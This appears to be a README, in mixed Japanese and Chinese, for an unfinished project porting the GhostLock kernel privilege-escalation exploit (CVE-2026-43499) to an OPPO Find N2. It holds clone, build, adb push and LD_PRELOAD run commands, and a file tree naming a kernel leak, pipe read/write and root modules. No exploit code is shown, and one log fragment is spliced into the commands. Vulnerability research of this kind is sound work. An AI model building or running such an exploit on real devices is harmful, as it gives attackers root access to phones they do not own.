
OPPO Find N2 GhostLock(CVE-2026-43499)エクスプロイト適応版
GhostLock CVE-2026-43499 — OPPO Find N2 Linux カーネル権限昇格の研究
GhostLock (CVE-2026-43499) は Linux 2.6.39 から 7.1-rc1 に影響するカーネルスタック UAF 脆弱性であり、FUTEX_CMP_REQUEUE_PI の競合状態によって引き起こされます。このプロジェクトは、NebuSec/CyberMeowfia の x86_64 exploit を OPPO Find N2 (ARM64, kernel 5.10.236) に移植します。
開発進行中 — 複数のエクスプロイト段階は検証済みですが、核心的なボトルネック(CFI bypass / カーネル書き込みプリミティブ)はまだ突破されていません。
FUTEX_CMP_REQUEUE_PI ret=0# 1. 克隆仓库
git clone https://github.com/pubglite55/oppo-ghostlock.git
cd oppo-ghostlock
# 2. 设置 NDK 路径
export NDK=/usr/local/Caskroom/android-ndk/29/AndroidNDK14206865.app/Contents/NDK
# 3. 编译 exploit
cd exploit/
make clean && make NDK=$NDK
# 4. 推送到设备
adb push preload.so /data/local/tmp/
# 5. 运行
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/ls /dev/null' 2>&1
oppo-ghostlock/
├── exploit/
│ ├── src/
│ │ ├── main.c # 主入口,GhostLock 触发
│ │ ├── fops.c # pselect fake lock + kernel base leak
│ │ ├── pipe.c # pipe 物理读写
│ │ ├── root.c # root 提权
│ │ ├── util.c # 工具函数
│ │ └── kernelsnitch/ # mm_struct 泄漏
│ ├── targets/ # 设备偏移定义
│ └── Makefile
└── README.md
このプロジェクトは MIT ライセンス を採用しています。